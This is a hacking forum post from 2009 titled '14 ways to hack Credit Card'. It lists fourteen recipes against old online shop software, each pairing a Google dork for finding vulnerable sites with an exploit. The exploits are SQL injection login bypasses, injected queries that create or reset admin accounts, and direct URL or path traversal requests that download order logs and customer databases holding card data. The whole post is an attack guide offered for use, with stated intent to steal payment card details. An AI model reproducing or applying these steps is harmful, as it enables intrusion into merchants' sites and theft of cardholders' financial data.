Multi Ethnic Hacking Group

    14 ways to hack Credit Card

    Share

    Foxi
    Admin

    Posts: 92
    Reputation: -1
    Join date: 2009-07-08

    14 ways to hack Credit Card

    Post by Foxi on Wed Jul 08, 2009 4:01 am

    1.
    Code:
    google dork :--> allinurl:/cart32.exe/
    target looks :--> http://www.xxxxxx.net/wrburns_s/cgi-...xe/NoItemFound
    chage NoItemFound whit error
    When we found Page error dig installation information beneath it, meant us was successful!
    If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
    Copy some file.C32 was or all of them to notepad or the program text the other editor.
    The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
    paste one by one, file.C32 at the end url has been modified earlier, with the format http://www.xxxxx.com/cart32/




    2-
    Code:
    google dork :--> inurl:"/cart.php?m="
    target looks lile :--> http://xxxxxxx.com/store/cart.php?m=view
    exploit: chage cart.php?m=view to /admin
    target whit exploit :--> http://xxxxxx.com/store/admin
    Usename : 'or"="
    Password : 'or"="




    3-
    Code:
    google dork :--> allinurlroddetail.asp?prod=
    target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
    exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
    target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb




    4-
    Code:
    google dork :--> allinurl: /cgi-local/shopper.cgi
    target looks like :--> http://www.xxxxxx.com/cgi-local/shop...dd=action&key=
    exploit :--> ...&template=order.log
    target whit exploit :--> http://www.xxxxxxxx.com/cgi-local/sh...late=order.log




    5-
    Code:
    google dork :--> allinurl: Lobby.asp
    target looks like :--> www.xxxxx.com/mall/lobby.asp
    exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
    target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb





    6-
    Code:
    google dork :--> allinurl:/vpasp/shopsearch.asp
    when u find a target put this in search box
    Keyword=&category=5); insert into tbluser (fldusername) values
    ('')--&SubCategory=&hide=&action.x=46&action.y=6
    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6
    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6
    Jangan lupa untuk mengganti dan nya terserah kamu.
    Untuk mengganti password admin, masukkan keyword berikut :
    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

    login page: http://xxxxxxx/vpasp/shopadmin.asp





    7-
    Code:
    google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
    target looks like :--> http://xxxxxxx.com/vpasp/shopdisplay...asp?cat=xxxxxx
    exploit :--> http://xxxxxxx.com/vpasp/shopdisplaypro ... ion%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
    if this is not working try this ends
    %20'a%25'--
    %20'b%25'--
    %20'c%25'--
    after finding user and pass go to login page:
    http://xxxx.com/vpasp/shopadmin.asp




    8-
    Code:
    google dork :--> allinurl:/shopadmin.asp
    target looks like :--> www.xxxxxx.com/shopadmin.asp
    exploit:
    user : 'or'1
    pass : 'or'1





    9-
    Code:
    google.com :--> allinurl:/store/index.cgi/page=
    target looks like :--> http://www.xxxxxx.com/cgi-bin/store/...short_blue.htm
    exploit :--> ../admin/files/order.log
    target whit exploit :--> http://www.xxxxxxx.com/cgi-bin/store...iles/order.log




    10-
    Code:
    google.com:--> allinurl:/metacart/
    target looks like :--> www.xxxxxx.com/metacart/about.asp
    exploit :--> /database/metacart.mdb
    target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb


    11-
    Code:
    google.com:--> allinurl:/DCShop/
    target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
    exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
    target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt





    12-

    Code:
    google.com:--> allinurl:/shop/category.asp/catid=
    target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
    exploit :--> /admin/dbsetup.asp
    target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
    after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
    target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
    in db look for access to find pass and user of shop admins.





    13-
    Code:
    google.com:--> allinurl:/commercesql/
    target looks like :--> www.xxxxx.com/commercesql/xxxxx
    exploit :--> cgi-bin/commercesql/index.cgi?page=
    target whit exploit admin config :--> http://www.xxxxxx.com/cgi-bin/commer... ... in_conf.pl
    target whit exploit admin manager :--> http://www.xxxxxx.com/cgi-bin/commer...in/manager.cgi
    target whit exploit order.log :--> http://www.xxxxx.com/cgi-bin/commerc...iles/order.log






    14-
    Code:
    google.com:--> allinurl:/eshop/
    target looks like :--> www.xxxxx.com/xxxxx/eshop
    exploit :-->/cg-bin/eshop/database/order.mdb
    target whit exploit :--> http://www.xxxxxx.com/.../cg-bin/e....base/order.mdb
    after dl the db look at access for user and password !!

      Current date/time is Sat Dec 20, 2014 12:39 am